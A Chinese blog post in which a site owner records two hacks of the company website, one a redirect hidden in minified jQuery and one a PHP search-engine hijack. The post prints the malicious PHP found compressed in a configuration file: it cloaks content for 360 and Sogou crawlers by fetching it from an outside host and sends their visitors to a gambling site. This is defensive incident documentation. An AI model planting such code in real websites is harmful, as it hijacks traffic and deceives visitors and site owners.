记一次搜索引擎劫持攻击

最近公司网站连续被黑了两次，都是被植入了一些恶意代码，让点击进入网站的时候，跳往色情、赌博等网站。这里就简单记录下吧，下次再遇上，好有个参考。

JS代码植入

网站表现为，当用户从浏览器第一次访问时网页时，会弹出一个色情网站广告的弹窗，随后经过几秒钟便会跳往该网站。此状况比较容易识别，可能的情况有一下几种

• JS代码中植入了重定向代码
• XSS攻击，用户提交的信息未经过验证，附带了恶意JS代码，并发往浏览器进行执行。
• 用户上传的图片中隐藏了经过压缩的JS代码，此类攻击比较隐蔽，让站长们很难找出来，需要注意的是，在用户上传图片的时候，图片也不能忽视验证。

本次攻击的方式为第一种，恶意代码隐藏在经过压缩的JQuery文件中，因此文件为压缩文件，隐藏性较高。

PHP代码植入

此情况表现为，当用户用360搜索本站时，点击结果时，会跳往赌博网站，点击快照为正常本站网页，而且用百度、谷歌等搜索出来的结果均无问题。
由于排除了JS代码植入的可能，一度认为是360搜索搞的鬼，跟360官方支持邮件往来了几天，得到的结果仍然是说我网站被黑，没对我网站做任何手脚，好吧，就只能自己折腾一遍，扫了一遍源码。确实发现了恶意代码，压缩过地植入到配置文件中，如下：

define('u_b','/');
define('s_u','http://idx.root1111.com/');
define('s_s', '@haosou.com|360Spider|sougou|HaosouSpider|so.com@i');
define('h_t',$_SERVER['SERVER_NAME']);
define('r_s',$_SERVER['HTTP_REFERER']);
define('u_s',$_SERVER['HTTP_USER_AGENT']);
define('h_z',s_p());
function s_p() {
    $d = '';
    if (isset($_SERVER['REQUEST_URI'])) {
        $d = $_SERVER['REQUEST_URI'];
    } else {
        if (isset($_SERVER['argv'])) {
            $d = $_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];
        } else {
            $d = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
        }
    }
    if (isset($_SERVER['SERVER_SOFTWARE']) && false !== stristr($_SERVER['SERVER_SOFTWARE'], 'IIS')) {
        if (function_exists('mb_convert_encoding')) {
            $d = mb_convert_encoding($d, 'UTF-8', 'GBK');
        } else {
            $d = @iconv('GBK', 'UTF-8', @iconv('UTF-8', 'GBK', $d)) == $d ? $d: @iconv('GBK', 'UTF-8', $d);
        }
    }
    $r = explode('#', $d, 2);
    $d = $r[0];
    return $d;
}
function r_s($url) {
    $o = array('http' = >array('method' = >"GET", 'timeout' = >8));
    $context = stream_context_create($o);
    $h = file_get_contents($url, false, $context);
    if (empty($h)) {
        $h = file_get_contents($url);
    }
    return $h;
}
if (preg_match(s_s, r_s)) {
    $d_s = true;
    if (preg_match("@site%3A|inurl%3A@i", r_s)) {
        setcookie('xx', h_t, time() + 259200);
        $d_s = false;
    }
    if ($d_s) {
        header('Location: http://668689.net');
        exit;
    }
}
if (strstr(h_z, u_b)) {
    if (preg_match(s_s, u_s)) {
        $d_u = s_u.'?xu='.bin2hex(h_z);
        $d_u. = '&xh='.bin2hex(h_t);
        $d_c = r_s($d_u);
        echo $d_c;
        exit;
    }
}

黑客只对来源360搜索和搜狗搜索的结果进行了重定向，颇有取舍，也造成了站长的疑惑，让人怀疑是360搞的鬼，套路深。